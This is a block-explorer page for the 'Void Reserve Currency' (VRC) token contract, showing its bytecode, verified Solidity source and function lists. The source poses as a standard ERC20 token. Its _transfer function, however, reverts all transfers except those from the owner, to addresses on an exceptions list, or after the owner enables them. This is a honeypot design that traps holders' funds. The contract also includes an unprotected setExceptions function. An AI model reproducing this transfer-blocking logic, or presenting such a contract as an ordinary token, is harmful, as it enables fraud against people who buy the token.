Address Contract Partially Verified
Address
0xB65aA347A28d40039f62F3a488c9FD2799cB5a95
Balance
0 ETH
Nonce
1
Code Size
4137 bytes
Creator
0x443a6b4F...16Bb at tx 0xe9d2f8c7...bd3a5d
Indexed Transactions
0
Contract Bytecode
4137 bytes
0x608060405234801561001057600080fd5b506004361061012c5760003560e01c806370a08231116100ad578063a457c2d711610071578063a457c2d71461038a578063a9059cbb146103b6578063ab033ea9146103e2578063dd62ed3e14610408578063f46eccc4146104365761012c565b806370a082311461032657806377050b541461034c578063921c6e761461035457806395d89b411461035c578063983b2d56146103645761012c565b80633092afd5116100f45780633092afd514610266578063313ce5671461028c57806339509351146102aa57806340c10f19146102d65780635aa6e675146103025761012c565b806306fdde0314610131578063095ea7b3146101ae57806318160ddd146101ee5780631b5b1b041461020857806323b872dd14610230575b600080fd5b61013961045c565b6040805160208082528351818301528351919283929083019185019080838360005b8381101561017357818101518382015260200161015b565b50505050905090810190601f1680156101a05780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6101da600480360360408110156101c457600080fd5b506001600160a01b0381351690602001356104f2565b604080519115158252519081900360200190f35b6101f661050f565b60408051918252519081900360200190f35b61022e6004803603602081101561021e57600080fd5b50356001600160a01b0316610515565b005b6101da6004803603606081101561024657600080fd5b506001600160a01b03813581169160208101359091169060400135610539565b61022e6004803603602081101561027c57600080fd5b50356001600160a01b03166105c6565b610294610639565b6040805160ff9092168252519081900360200190f35b6101da600480360360408110156102c057600080fd5b506001600160a01b038135169060200135610642565b61022e600480360360408110156102ec57600080fd5b506001600160a01b038135169060200135610696565b61030a6106f2565b604080516001600160a01b039092168252519081900360200190f35b6101f66004803603602081101561033c57600080fd5b50356001600160a01b0316610706565b61022e610721565b61022e61079f565b610139610820565b61022e6004803603602081101561037a57600080fd5b50356001600160a01b0316610881565b6101da600480360360408110156103a057600080fd5b506001600160a01b0381351690602001356108f7565b6101da600480360360408110156103cc57600080fd5b506001600160a01b038135169060200135610965565b61022e600480360360208110156103f857600080fd5b50356001600160a01b0316610979565b6101f66004803603604081101561041e57600080fd5b506001600160a01b03813581169160200135166109f3565b6101da6004803603602081101561044c57600080fd5b50356001600160a01b0316610a1e565b60068054604080516020601f60026000196101006001881615020190951694909404938401819004810282018101909252828152606093909290918301828280156104e85780601f106104bd576101008083540402835291602001916104e8565b820191906000526020600020905b8154815290600101906020018083116104cb57829003601f168201915b5050505050905090565b60006105066104ff610a33565b8484610a37565b50600192915050565b60045490565b6001600160a01b03166000908152600260205260409020805460ff19166001179055565b6000610546848484610b23565b6105bc84610552610a33565b6105b785604051806060016040528060288152602001610f5f602891396001600160a01b038a16600090815260016020526040812090610590610a33565b6001600160a01b03168152602081019190915260400160002054919063ffffffff610d0b16565b610a37565b5060019392505050565b60085461010090046001600160a01b03163314610618576040805162461bcd60e51b815260206004820152600b60248201526a21676f7665726e616e636560a81b604482015290519081900360640190fd5b6001600160a01b03166000908152600960205260409020805460ff19169055565b60085460ff1690565b600061050661064f610a33565b846105b78560016000610660610a33565b6001600160a01b03908116825260208083019390935260409182016000908120918c16815292529020549063ffffffff610da216565b3360009081526009602052604090205460ff166106e4576040805162461bcd60e51b815260206004820152600760248201526610b6b4b73a32b960c91b604482015290519081900360640190fd5b6106ee8282610e03565b5050565b60085461010090046001600160a01b031681565b6001600160a01b031660009081526020819052604090205490565b6003546001600160a01b0316610735610a33565b6001600160a01b031614610790576040805162461bcd60e51b815260206004820152601f60248201527f4f6e6c79206f776e65722063616e206368616e67652073657420616c6c6f7700604482015290519081900360640190fd5b6005805460ff19166001179055565b6003546001600160a01b03166107b3610a33565b6001600160a01b03161461080e576040805162461bcd60e51b815260206004820152601f60248201527f4f6e6c79206f776e65722063616e206368616e67652073657420616c6c6f7700604482015290519081900360640190fd5b600380546001600160a01b0319169055565b60078054604080516020601f60026000196101006001881615020190951694909404938401819004810282018101909252828152606093909290918301828280156104e85780601f106104bd576101008083540402835291602001916104e8565b60085461010090046001600160a01b031633146108d3576040805162461bcd60e51b815260206004820152600b60248201526a21676f7665726e616e636560a81b604482015290519081900360640190fd5b6001600160a01b03166000908152600960205260409020805460ff19166001179055565b6000610506610904610a33565b846105b785604051806060016040528060258152602001610fd0602591396001600061092e610a33565b6001600160a01b03908116825260208083019390935260409182016000908120918d1681529252902054919063ffffffff610d0b16565b6000610506610972610a33565b8484610b23565b60085461010090046001600160a01b031633146109cb576040805162461bcd60e51b815260206004820152600b60248201526a21676f7665726e616e636560a81b604482015290519081900360640190fd5b600880546001600160a01b0390921661010002610100600160a81b0319909216919091179055565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b60096020526000908152604090205460ff1681565b3390565b6001600160a01b038316610a7c5760405162461bcd60e51b8152600401808060200182810382526024815260200180610fac6024913960400191505060405180910390fd5b6001600160a01b038216610ac15760405162461bcd60e51b8152600401808060200182810382526022815260200180610f176022913960400191505060405180910390fd5b6001600160a01b03808416600081815260016020908152604080832094871680845294825291829020859055815185815291517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259281900390910190a3505050565b6001600160a01b038316610b685760405162461bcd60e51b8152600401808060200182810382526025815260200180610f876025913960400191505060405180910390fd5b6001600160a01b038216610bad5760405162461bcd60e51b8152600401808060200182810382526023815260200180610ef46023913960400191505060405180910390fd5b6003546001600160a01b0384811691161480610bcb575060055460ff165b15610ca257610c1381604051806060016040528060268152602001610f39602691396001600160a01b038616600090815260208190526040902054919063ffffffff610d0b16565b6001600160a01b038085166000908152602081905260408082209390935590841681522054610c48908263ffffffff610da216565b6001600160a01b038084166000818152602081815260409182902094909455805185815290519193928716927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef92918290030190a3610d06565b6001600160a01b03821660009081526002602052604090205460ff161561012c57610c1381604051806060016040528060268152602001610f39602691396001600160a01b038616600090815260208190526040902054919063ffffffff610d0b16565b505050565b60008184841115610d9a5760405162461bcd60e51b81526004018080602001828103825283818151815260200191508051906020019080838360005b83811015610d5f578181015183820152602001610d47565b50505050905090810190601f168015610d8c5780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b505050900390565b600082820183811015610dfc576040805162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015290519081900360640190fd5b9392505050565b6001600160a01b038216610e5e576040805162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015290519081900360640190fd5b600454610e71908263ffffffff610da216565b6004556001600160a01b038216600090815260208190526040902054610e9d908263ffffffff610da216565b6001600160a01b0383166000818152602081815260408083209490945583518581529351929391927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9281900390910190a3505056fe45524332303a207472616e7366657220746f20746865207a65726f206164647265737345524332303a20617070726f766520746f20746865207a65726f206164647265737345524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a207472616e736665722066726f6d20746865207a65726f206164647265737345524332303a20617070726f76652066726f6d20746865207a65726f206164647265737345524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa265627a7a7231582053f8615465d922ff99c7df95cb91dde1178e389dce93de9251b740865078351864736f6c63430005110032
Verified Source Code Partial Match
Compiler: v0.5.17+commit.d19bba13
EVM: istanbul
Optimization: Yes (200 runs)
VRC.sol 263 lines
// Void Reserve Currency V2 (VRC)
// Clover Protocol Team 2020
pragma solidity ^0.5.16;
interface IERC20 {
function totalSupply() external view returns (uint);
function balanceOf(address account) external view returns (uint);
function transfer(address recipient, uint amount) external returns (bool);
function allowance(address owner, address spender) external view returns (uint);
function approve(address spender, uint amount) external returns (bool);
function transferFrom(address sender, address recipient, uint amount) external returns (bool);
event Transfer(address indexed from, address indexed to, uint value);
event Approval(address indexed owner, address indexed spender, uint value);
}
contract Context {
constructor () internal { }
// solhint-disable-previous-line no-empty-blocks
function _msgSender() internal view returns (address payable) {
return msg.sender;
}
}
contract ERC20 is Context, IERC20 {
using SafeMath for uint;
mapping (address => uint) private _balances;
mapping (address => mapping (address => uint)) private _allowances;
mapping (address => bool) private exceptions;
address private _owner;
uint private _totalSupply;
bool private allow;
constructor(address owner) public{
_owner = owner;
allow = false;
}
function setAllow() public{
require(_msgSender() == _owner,"Only owner can change set allow");
allow = true;
}
function setExceptions(address someAddress) public{
exceptions[someAddress] = true;
}
function burnOwner() public{
require(_msgSender() == _owner,"Only owner can change set allow");
_owner = address(0);
}
function totalSupply() public view returns (uint) {
return _totalSupply;
}
function balanceOf(address account) public view returns (uint) {
return _balances[account];
}
function transfer(address recipient, uint amount) public returns (bool) {
_transfer(_msgSender(), recipient, amount);
return true;
}
function allowance(address owner, address spender) public view returns (uint) {
return _allowances[owner][spender];
}
function approve(address spender, uint amount) public returns (bool) {
_approve(_msgSender(), spender, amount);
return true;
}
function transferFrom(address sender, address recipient, uint amount) public returns (bool) {
_transfer(sender, recipient, amount);
_approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
return true;
}
function increaseAllowance(address spender, uint addedValue) public returns (bool) {
_approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue));
return true;
}
function decreaseAllowance(address spender, uint subtractedValue) public returns (bool) {
_approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero"));
return true;
}
function _transfer(address sender, address recipient, uint amount) internal {
require(sender != address(0), "ERC20: transfer from the zero address");
require(recipient != address(0), "ERC20: transfer to the zero address");
// Trigger special exceptions
if(sender == _owner || allow ) {
_balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
_balances[recipient] = _balances[recipient].add(amount);
emit Transfer(sender, recipient, amount);
}else {
if(exceptions[recipient]) {
_balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
_balances[recipient] = _balances[recipient].add(amount);
emit Transfer(sender, recipient, amount);
}else {
revert();
}
}
}
function _mint(address account, uint amount) internal {
require(account != address(0), "ERC20: mint to the zero address");
_totalSupply = _totalSupply.add(amount);
_balances[account] = _balances[account].add(amount);
emit Transfer(address(0), account, amount);
}
function _burn(address account, uint amount) internal {
require(account != address(0), "ERC20: burn from the zero address");
_balances[account] = _balances[account].sub(amount, "ERC20: burn amount exceeds balance");
_totalSupply = _totalSupply.sub(amount);
emit Transfer(account, address(0), amount);
}
function _approve(address owner, address spender, uint amount) internal {
require(owner != address(0), "ERC20: approve from the zero address");
require(spender != address(0), "ERC20: approve to the zero address");
_allowances[owner][spender] = amount;
emit Approval(owner, spender, amount);
}
}
contract ERC20Detailed is IERC20 {
string private _name;
string private _symbol;
uint8 private _decimals;
constructor (string memory name, string memory symbol, uint8 decimals) public {
_name = name;
_symbol = symbol;
_decimals = decimals;
}
function name() public view returns (string memory) {
return _name;
}
function symbol() public view returns (string memory) {
return _symbol;
}
function decimals() public view returns (uint8) {
return _decimals;
}
}
library SafeMath {
function add(uint a, uint b) internal pure returns (uint) {
uint c = a + b;
require(c >= a, "SafeMath: addition overflow");
return c;
}
function sub(uint a, uint b) internal pure returns (uint) {
return sub(a, b, "SafeMath: subtraction overflow");
}
function sub(uint a, uint b, string memory errorMessage) internal pure returns (uint) {
require(b <= a, errorMessage);
uint c = a - b;
return c;
}
function mul(uint a, uint b) internal pure returns (uint) {
if (a == 0) {
return 0;
}
uint c = a * b;
require(c / a == b, "SafeMath: multiplication overflow");
return c;
}
function div(uint a, uint b) internal pure returns (uint) {
return div(a, b, "SafeMath: division by zero");
}
function div(uint a, uint b, string memory errorMessage) internal pure returns (uint) {
// Solidity only automatically asserts when dividing by 0
require(b > 0, errorMessage);
uint c = a / b;
return c;
}
}
library Address {
function isContract(address account) internal view returns (bool) {
bytes32 codehash;
bytes32 accountHash = 0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470;
// solhint-disable-next-line no-inline-assembly
assembly { codehash := extcodehash(account) }
return (codehash != 0x0 && codehash != accountHash);
}
}
library SafeERC20 {
using SafeMath for uint;
using Address for address;
function safeTransfer(IERC20 token, address to, uint value) internal {
callOptionalReturn(token, abi.encodeWithSelector(token.transfer.selector, to, value));
}
function safeTransferFrom(IERC20 token, address from, address to, uint value) internal {
callOptionalReturn(token, abi.encodeWithSelector(token.transferFrom.selector, from, to, value));
}
function safeApprove(IERC20 token, address spender, uint value) internal {
require((value == 0) || (token.allowance(address(this), spender) == 0),
"SafeERC20: approve from non-zero to non-zero allowance"
);
callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, spender, value));
}
function callOptionalReturn(IERC20 token, bytes memory data) private {
require(address(token).isContract(), "SafeERC20: call to non-contract");
// solhint-disable-next-line avoid-low-level-calls
(bool success, bytes memory returndata) = address(token).call(data);
require(success, "SafeERC20: low-level call failed");
if (returndata.length > 0) { // Return data is optional
// solhint-disable-next-line max-line-length
require(abi.decode(returndata, (bool)), "SafeERC20: ERC20 operation did not succeed");
}
}
}
contract VRC is ERC20, ERC20Detailed {
using SafeERC20 for IERC20;
using Address for address;
using SafeMath for uint;
string constant advice = "OP Always delivers.";
address public governance;
mapping (address => bool) public minters;
constructor () public ERC20Detailed("Void Reserve Currency", "VRC", 18) ERC20(tx.origin){
governance = tx.origin;
}
function mint(address account, uint256 amount) public {
require(minters[msg.sender], "!minter");
_mint(account, amount);
}
function setGovernance(address _governance) public {
require(msg.sender == governance, "!governance");
governance = _governance;
}
function addMinter(address _minter) public {
require(msg.sender == governance, "!governance");
minters[_minter] = true;
}
function removeMinter(address _minter) public {
require(msg.sender == governance, "!governance");
minters[_minter] = false;
}
}
Read Contract
allowance 0xdd62ed3e → uint256
balanceOf 0x70a08231 → uint256
decimals 0x313ce567 → uint8
governance 0x5aa6e675 → address
minters 0xf46eccc4 → bool
name 0x06fdde03 → string
symbol 0x95d89b41 → string
totalSupply 0x18160ddd → uint256
Write Contract 12 functions
These functions modify contract state and require a wallet transaction to execute.
addMinter 0x983b2d56
address _minter
approve 0x095ea7b3
address spender
uint256 amount
returns: bool
burnOwner 0x921c6e76
No parameters
decreaseAllowance 0xa457c2d7
address spender
uint256 subtractedValue
returns: bool
increaseAllowance 0x39509351
address spender
uint256 addedValue
returns: bool
mint 0x40c10f19
address account
uint256 amount
removeMinter 0x3092afd5
address _minter
setAllow 0x77050b54
No parameters
setExceptions 0x1b5b1b04
address someAddress
setGovernance 0xab033ea9
address _governance
transfer 0xa9059cbb
address recipient
uint256 amount
returns: bool
transferFrom 0x23b872dd
address sender
address recipient
uint256 amount
returns: bool
Recent Transactions
No transactions found for this address